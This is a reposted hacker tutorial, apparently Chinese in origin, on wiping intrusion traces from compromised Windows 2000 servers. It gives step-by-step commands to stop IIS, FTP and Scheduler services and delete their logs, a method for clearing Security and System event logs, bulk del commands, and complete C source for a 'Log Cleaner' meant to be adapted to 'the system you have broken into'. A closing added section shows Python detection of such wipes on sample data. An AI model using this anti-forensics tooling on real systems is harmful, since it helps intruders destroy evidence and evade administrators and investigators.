How to write a log cleaner

xiaoxiao, 2021-03-06

Xiao Yan's CleanIISLog is a nice log-clearing tool. Unfortunately it only clears the IIS log; the log files produced by the FTP service and the Scheduler we generally still have to clear by hand.

Windows 2000 log files typically include the application log, security log, system log, DNS server log, FTP log and WWW log; the exact set depends on which services the server has enabled.

The general steps are as follows.

1. Clear the IIS log. Don't underestimate the IIS log: it records your whole intrusion, such as the commands you sent through IE during a Unicode attack and the traces left by scanning port 80. You may pay it no attention, but the administrator is staring at it, and then maybe... Ha. We can remove it by hand.

The default location of the log is %systemroot%\system32\logfiles\w3svc1\, with one file per day. Change to that directory and run DEL *.*. To be safe you then run DIR, and today's log is still there. Don't panic: the W3SVC service is still running and holds today's file open, so how do we clear it?

Method 1: if port 3389 (Terminal Services) is open and you can log in, open the file in Notepad, press Ctrl+A, then Del, and save.

Method 2: the NET commands:

C:\> net stop w3svc
The World Wide Web Publishing Service service is stopping.
(This may take a long time and may not succeed.)
The World Wide Web Publishing Service service was stopped successfully.

With W3SVC stopped we can empty the directory: del *.*. Don't forget to start W3SVC again:

C:\> net start w3svc

2. Clear the FTP log. Default location: %systemroot%\system32\logfiles\msftpsvc1\, again one file per day. Clear it the same way (the service is MSFTPSVC).

3. Clear the Scheduler log. The Task Scheduler service log is by default %systemroot%\schedlgu.txt; clear it the same way (the service is called Schedule).

4. Application log, security log, system log and DNS server log. Default location: %systemroot%\system32\config. Cleaning method: see step 5. Note that the directories above may not be where I said, because the administrator can move them; read the registry to get their real locations. The application, security, system and DNS server log files are listed under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog (one subkey per log), and the Scheduler service log under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent.

5. (Borrowed from, in fact copied from, someone else's article.) OK! Congratulations, the simple logs have now been deleted. Now come the hard ones, the security log and the system log, which are guarded by the Event Log service. Try stopping it:

D:\Server\System32\LogFiles\W3SVC1> net stop eventlog
This service cannot accept the requested "pause" or "stop" operation.

No luck; it is a core service. Without a third-party tool you cannot delete the security log and system log from the command line at all, because the service holds the .evt files open. So we fall back on a method that is simple but painfully slow. Open "Event Viewer" under "Administrative Tools" in "Control Panel" (Windows 98 has none; here you see the benefit of Win2K). The "Action" menu has an item named "Connect to another computer"; click it (screenshot not reproduced). Enter the IP address of the remote computer, click OK, wait tens of minutes enduring the slowness, and the window below opens (screenshot not reproduced):

Select the remote computer's Security log, right-click it and choose Properties.

Click the "Clear Log" button in the Properties dialog. OK! The security log is cleared! Endure the same pain to clear the System log.

6. Most of the important logs are now cleared. What remains is mopping up anything left over. Run the following deletions (paths relative to the drive root; the .evt files under config are held open by the Event Log service, which is why step 5 was needed):

del \winnt\*.log
del \winnt\system32\logfiles\*.*
del \winnt\system32\dtclog\*.*
del \winnt\system32\config\*.evt
del \winnt\system32\*.log
del \winnt\system32\*.txt

So far we have gone through clearing most of the logs I know of. Now that you have seen the whole process, you will agree that doing it by hand eats a lot of time, and sometimes something still gets missed. A friend who can program will think: I can write this. As you have understood, clearing some logs first requires stopping some services, so I will teach you how to write a DOS gadget that can look at a machine's services; the implementation is in my earlier article "How to write a DOS service viewer". The tool is SerName.exe: run sername.exe -t 1 and every service running on the machine is listed. Remember the name of the service you want to stop; it is needed below.

The second step of the programming is stopping the service programs: W3SVC, Schedule and the FTP service. The code I wrote, by slowly reading MSDN, is as follows. (It isn't difficult; if there is something you don't understand, don't come asking me.)

// Built as an ANSI (non-UNICODE) project, so LPCTSTR is const char* and %s works in printf.
#include <windows.h>
#include <stdio.h>

void StopServices(LPCTSTR lpServiceName)
{
    // SC_MANAGER_CONNECT is the access right OpenService needs on the SCM handle
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    if (scman) {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
        if (sh) {
            SERVICE_STATUS ServiceStatus;
            // ControlService only sends the stop request; the service may still be in
            // SERVICE_STOP_PENDING when this returns (hence the Sleep() calls later on)
            BOOL bControl = ::ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
            if (bControl) {
                printf("success to stop the service \"%s\"\n", lpServiceName);
            } else {
                DWORD dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED:
                    printf("The specified handle was not opened with the necessary access.\n"); break;
                case ERROR_SERVICE_NOT_ACTIVE:
                    printf("The service has not been started.\n"); break;
                case ERROR_DEPENDENT_SERVICES_RUNNING:
                    printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
                case ERROR_INVALID_SERVICE_CONTROL:
                    printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
                case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:
                    printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT:
                    printf("The service did not respond to the stop request in a timely fashion.\n"); break;
                default:
                    printf("ControlService failed, error %lu\n", dwControl); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
}

That is the function; now write a main function to try it:

int main()
{
    StopServices("W3SVC");
    return 0;
}

OK, success. If it did not succeed, look at the error message printed. So now we have a function that can stop a service.

Next we also need a function that can start a service. If you understood the code above, the following is just a few small changes to it.

void StartServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    if (scman) {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
        if (sh) {
            // no command-line arguments are passed to the service's ServiceMain
            BOOL bControl = ::StartService(sh, 0, NULL);
            if (bControl) {
                printf("success to start the service \"%s\"\n", lpServiceName);
            } else {
                DWORD dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED:
                    printf("The specified handle was not opened with SERVICE_START access.\n"); break;
                case ERROR_INVALID_HANDLE:
                    printf("The specified handle is invalid.\n"); break;
                case ERROR_PATH_NOT_FOUND:
                    printf("The service binary file could not be found.\n"); break;
                case ERROR_SERVICE_ALREADY_RUNNING:
                    printf("An instance of the service is already running.\n"); break;
                case ERROR_SERVICE_DATABASE_LOCKED:
                    printf("The database is locked.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_DELETED:
                    printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_FAIL:
                    printf("The service depends on another service that has failed to start.\n"); break;
                case ERROR_SERVICE_DISABLED:
                    printf("The service has been disabled.\n"); break;
                case ERROR_SERVICE_LOGON_FAILED:
                    printf("The service could not be logged on.\n"); break;
                case ERROR_SERVICE_MARKED_FOR_DELETE:
                    printf("The service has been marked for deletion.\n"); break;
                case ERROR_SERVICE_NO_THREAD:
                    printf("A thread could not be created for the service.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT:
                    printf("The service did not respond to the start request in a timely fashion.\n"); break;
                default:
                    printf("StartService failed, error %lu\n", dwControl); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
}

Just a few small changes. Now you have these two weapons; the file deletion part only needs the knowledge from the first half of the article, so I won't teach it, you must think about how to do it yourself.

Now the third weapon. Our program could do without it, but a tidy program needs it: a function that reports the state of a service, so we only stop services that are actually running.

My code is as follows.

DWORD GetServicesState(LPCTSTR lpServiceName)
{
    DWORD dwState = 0;   // 0 is not a SERVICE_* state value, so it means "unknown"
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    if (scman) {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
        if (sh) {
            SERVICE_STATUS ServiceStatus;
            if (!::QueryServiceStatus(sh, &ServiceStatus)) {
                DWORD dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED:
                    printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                case ERROR_INVALID_HANDLE:
                    printf("The specified handle is invalid.\n"); break;
                default:
                    printf("QueryServiceStatus failed, error %lu\n", dwControl); break;
                }
                dwState = 0;
            } else {
                // SERVICE_RUNNING, SERVICE_STOPPED, SERVICE_STOP_PENDING, ...
                dwState = ServiceStatus.dwCurrentState;
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return dwState;
}

Well, that is everything; now the complete program. The remaining code follows. Do adapt the source to the particular system you have broken into before running it.

// ============================================================
//
//   Green Corps Log Cleaner 1.0
//
//   compiled by http://www.vertarmy.com Green Corps
//   http://vcghost.yeah.net
//
// ============================================================
// Built as an ANSI (non-UNICODE) project, so TCHAR is char.
#include <windows.h>
#include <stdio.h>

void StopServices(LPCTSTR lpServiceName);
void StartServices(LPCTSTR lpServiceName);
DWORD GetServicesState(LPCTSTR lpServiceName);
void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory);
void Del3WFile();
void DelFtpFile();
void DelScheduleFile();
void DelOtherFile();
void showTitle();

int main(int argc, char *argv[])
{
    showTitle();
    Del3WFile();
    DelFtpFile();
    DelScheduleFile();
    DelOtherFile();
    showTitle();
    return 0;
}

// StopServices, StartServices and GetServicesState are exactly the three
// functions listed above.

// Delete every file matching the wildcard lpFileName; lpDirectory is the same
// directory with a trailing backslash, used to build each full path.
void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory)
{
    TCHAR tcFileName[1024];
    WIN32_FIND_DATA FindFileData;
    HANDLE hFile = ::FindFirstFile(lpFileName, &FindFileData);
    if (hFile != INVALID_HANDLE_VALUE) {
        do {
            // "*.*" also matches ".", ".." and subdirectories; skip them
            if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                continue;
            lstrcpy(tcFileName, lpDirectory);
            lstrcat(tcFileName, FindFileData.cFileName);
            if (::DeleteFile(tcFileName))
                printf("delete file \"%s\" success\n", tcFileName);
            else
                // typically a sharing violation: a running service still holds the file open
                printf("delete file \"%s\" fail (error %lu)\n", tcFileName, ::GetLastError());
        } while (::FindNextFile(hFile, &FindFileData));
        ::FindClose(hFile);
    }
}

// Stop lpServiceName if it is running, delete the matching files, then restart it.
static void DelServiceLogs(LPCTSTR lpServiceName, LPCTSTR lpFileName, LPCTSTR lpDirectory)
{
    BOOL bWasRunning = (GetServicesState(lpServiceName) == SERVICE_RUNNING);
    if (bWasRunning) {
        StopServices(lpServiceName);
        ::Sleep(1000);   // crude: should poll GetServicesState() until SERVICE_STOPPED
    }
    DelFiles(lpFileName, lpDirectory);
    if (bWasRunning) {
        ::Sleep(1000);   // should consider using threads
        StartServices(lpServiceName);
    }
}

// %systemroot%\system32\logfiles\w3svc1\*.log, held open by W3SVC
void Del3WFile()
{
    TCHAR tc3WDirectory[1024], tc3WFile[1024];
    ::GetSystemDirectory(tc3WDirectory, 1024);
    lstrcat(tc3WDirectory, "\\logfiles\\w3svc1\\");
    lstrcpy(tc3WFile, tc3WDirectory);
    lstrcat(tc3WFile, "*.log");
    DelServiceLogs("W3SVC", tc3WFile, tc3WDirectory);
}

// %systemroot%\system32\logfiles\msftpsvc1\*.log, held open by MSFTPSVC
void DelFtpFile()
{
    TCHAR tcFtpDirectory[1024], tcFtpFile[1024];
    ::GetSystemDirectory(tcFtpDirectory, 1024);
    lstrcat(tcFtpDirectory, "\\logfiles\\msftpsvc1\\");
    lstrcpy(tcFtpFile, tcFtpDirectory);
    lstrcat(tcFtpFile, "*.log");
    DelServiceLogs("MSFTPSVC", tcFtpFile, tcFtpDirectory);
}

// Cut "\system32" off the system directory to get %systemroot% (e.g. C:\WINNT)
static void GetWinDirectory(TCHAR *tcWinDirectory)
{
    ::GetSystemDirectory(tcWinDirectory, 1024);
    int iLength = lstrlen(tcWinDirectory);
    while (iLength > 0 && tcWinDirectory[--iLength] != '\\')
        ;
    tcWinDirectory[iLength] = '\0';
}

// %systemroot%\schedlgu.txt, held open by the Task Scheduler ("Schedule")
void DelScheduleFile()
{
    TCHAR tcScheduleFile[1024];
    GetWinDirectory(tcScheduleFile);
    lstrcat(tcScheduleFile, "\\schedlgu.txt");
    BOOL bWasRunning = (GetServicesState("Schedule") == SERVICE_RUNNING);
    if (bWasRunning) {
        StopServices("Schedule");
        ::Sleep(1000);
    }
    if (::DeleteFile(tcScheduleFile))
        printf("delete file \"%s\" success\n", tcScheduleFile);
    else
        printf("delete file \"%s\" fail (error %lu)\n", tcScheduleFile, ::GetLastError());
    if (bWasRunning) {
        ::Sleep(1000);   // should consider using threads
        StartServices("Schedule");
    }
}

// Everything step 6 deletes by hand
void DelOtherFile()
{
    TCHAR tcSystemDirectory[1024], tcWinDirectory[1024];
    TCHAR tcOtherFile[1024], tcOtherDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    GetWinDirectory(tcWinDirectory);

    struct { LPCTSTR base; LPCTSTR subdir; LPCTSTR pattern; } targets[] = {
        { tcSystemDirectory, "\\logfiles\\", "*.*" },   // whatever is left under logfiles
        { tcSystemDirectory, "\\dtclog\\",   "*.*" },   // MS DTC log
        { tcSystemDirectory, "\\config\\",   "*.*" },   // the .evt files; the Event Log service holds
                                                        // them open and the registry hives are locked,
                                                        // so these deletions fail on a live system
        { tcSystemDirectory, "\\",           "*.log" },
        { tcSystemDirectory, "\\",           "*.txt" },
        { tcWinDirectory,    "\\",           "*.log" },
        { tcWinDirectory,    "\\",           "*.txt" },
    };
    for (int i = 0; i < (int)(sizeof(targets) / sizeof(targets[0])); i++) {
        lstrcpy(tcOtherDirectory, targets[i].base);
        lstrcat(tcOtherDirectory, targets[i].subdir);
        lstrcpy(tcOtherFile, tcOtherDirectory);
        lstrcat(tcOtherFile, targets[i].pattern);
        DelFiles(tcOtherFile, tcOtherDirectory);
    }
}

void showTitle()
{
    printf("============================================================\n");
    printf("$        Green Corps Log Cleaner 1.0                       $\n");
    printf("$   compiled by http://www.vertarmy.com Green Corps        $\n");
    printf("$   http://vcghost.yeah.net                                $\n");
    printf("$   tjhac@163.com                                          $\n");
    printf("============================================================\n");
}

(Reposted from Black and White Network)

Several log-clearing commands for the last step:

del C:\WinNT\System32\LogFiles\*.*
del C:\WinNT\System32\Config\*.evt
del C:\WinNT\System32\DTCLog\*.*
del C:\WinNT\System32\*.log
del C:\WinNT\System32\*.txt
del C:\WinNT\*.txt
del C:\WinNT\*.log

Note: * means "all"; for example, del C:\WinNT\*.log deletes every file with the extension .log in the WinNT directory on drive C.
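What the procedure above leaves behind, whether done by hand with net stop / del / net start or with the Green Corps tool, is worth knowing before relying on it. This added illustration is not part of the original article or of the tool; it runs over constructed sample records rather than a real event log, and the service display names, timestamps and file names in it are made up for the example. Three traces are checked: the Service Control Manager logs event 7036 each time W3SVC, MSFTPSVC or Schedule changes state, so a stop followed seconds later by a start stands out; clearing the Security log in step 5 makes the Event Log service write event 517 ("The audit log was cleared") as the first record of the emptied log on NT 4/2000/XP/2003 (Vista and later use 1102, and 104 for the System log), so the clear records itself; and deleting all but today's IIS log leaves a hole in the daily exYYMMDD.log sequence.

```python
"""Added illustration: traces a Windows 2000 log wipe like the one above leaves
behind, checked over constructed sample records (not the article's or the
Green Corps tool's code)."""
import re
from datetime import datetime, timedelta

# Services the procedure stops so their open log file can be deleted, named as
# the Service Control Manager names them in event 7036 messages.
LOG_HOLDING_SERVICES = {
    "World Wide Web Publishing Service",  # W3SVC
    "FTP Publishing Service",             # MSFTPSVC
    "Task Scheduler",                     # Schedule
}

# "The audit log was cleared": event 517 on NT 4/2000/XP/2003. The Event Log
# service writes it as the first record of the freshly emptied Security log,
# so it survives the clear it describes. Vista and later use 1102 for the
# Security log and 104 for the System log.
AUDIT_LOG_CLEARED = 517

SCM_STATE_RE = re.compile(r"The (.+?) service entered the (stopped|running) state\.")
IIS_DAILY_RE = re.compile(r"^ex(\d{6})\.log$", re.IGNORECASE)

# Constructed sample event records: (timestamp, source, event id, message).
SAMPLE_EVENTS = [
    ("2001-05-12 02:13:41", "Service Control Manager", 7036,
     "The World Wide Web Publishing Service service entered the stopped state."),
    ("2001-05-12 02:13:43", "Service Control Manager", 7036,
     "The World Wide Web Publishing Service service entered the running state."),
    ("2001-05-12 02:13:44", "Service Control Manager", 7036,
     "The FTP Publishing Service service entered the stopped state."),
    ("2001-05-12 02:13:46", "Service Control Manager", 7036,
     "The FTP Publishing Service service entered the running state."),
    ("2001-05-12 02:14:02", "Security", 517, "The audit log was cleared."),
    ("2001-05-12 03:00:00", "Service Control Manager", 7036,
     "The Messenger service entered the stopped state."),  # unrelated service
]

# Constructed directory listing of %systemroot%\system32\LogFiles\W3SVC1.
SAMPLE_IIS_FILES = ["ex010510.log", "ex010511.log", "ex010513.log", "ex010514.log"]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def find_stop_start_pairs(events, window_seconds=60):
    """(service, stopped_at, restarted_at) for each log-holding service that was
    stopped and brought back within window_seconds: the signature of
    'net stop', delete, 'net start', or of Del3WFile/DelFtpFile above."""
    stopped_at = {}
    pairs = []
    for ts, source, event_id, message in sorted(events, key=lambda e: e[0]):
        if source != "Service Control Manager" or event_id != 7036:
            continue
        m = SCM_STATE_RE.match(message)
        if not m or m.group(1) not in LOG_HOLDING_SERVICES:
            continue
        service, state, when = m.group(1), m.group(2), _ts(ts)
        if state == "stopped":
            stopped_at[service] = when
        elif service in stopped_at:
            t0 = stopped_at.pop(service)
            if when - t0 <= timedelta(seconds=window_seconds):
                pairs.append((service, t0, when))
    return pairs


def find_audit_log_clears(events):
    """Timestamps at which the Security log was cleared (event 517)."""
    return [_ts(ts) for ts, source, event_id, _ in events
            if source == "Security" and event_id == AUDIT_LOG_CLEARED]


def find_iis_log_gaps(filenames):
    """Dates missing from a daily IIS W3C log sequence (exYYMMDD.log).
    IIS creates a day's file on that day's first request, so a gap is a
    reason to look closer, not proof of deletion."""
    days = sorted(datetime.strptime(m.group(1), "%y%m%d").date()
                  for m in map(IIS_DAILY_RE.match, filenames) if m)
    if len(days) < 2:
        return []
    present = set(days)
    span = (days[-1] - days[0]).days
    return [d for d in (days[0] + timedelta(days=i) for i in range(span + 1))
            if d not in present]


if __name__ == "__main__":
    for service, t0, t1 in find_stop_start_pairs(SAMPLE_EVENTS):
        print(f"{service}: stopped {t0:%H:%M:%S}, running again {t1:%H:%M:%S}")
    for t in find_audit_log_clears(SAMPLE_EVENTS):
        print(f"Security log cleared at {t}")
    print("missing IIS log days:",
          [d.isoformat() for d in find_iis_log_gaps(SAMPLE_IIS_FILES)])
```

On the sample data this reports the W3SVC and MSFTPSVC stop/start pairs two seconds apart, the 02:14:02 Security log clear, and 2001-05-12 missing from the IIS sequence. The System log, where the 7036 records live, is one the article clears last of all, but the 517 record is written into the very log that was just emptied, which is the point: this kind of wipe removes history, not the fact that a wipe happened.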

When reposting, please credit the original: https://www.9cbs.com/read-89426.html
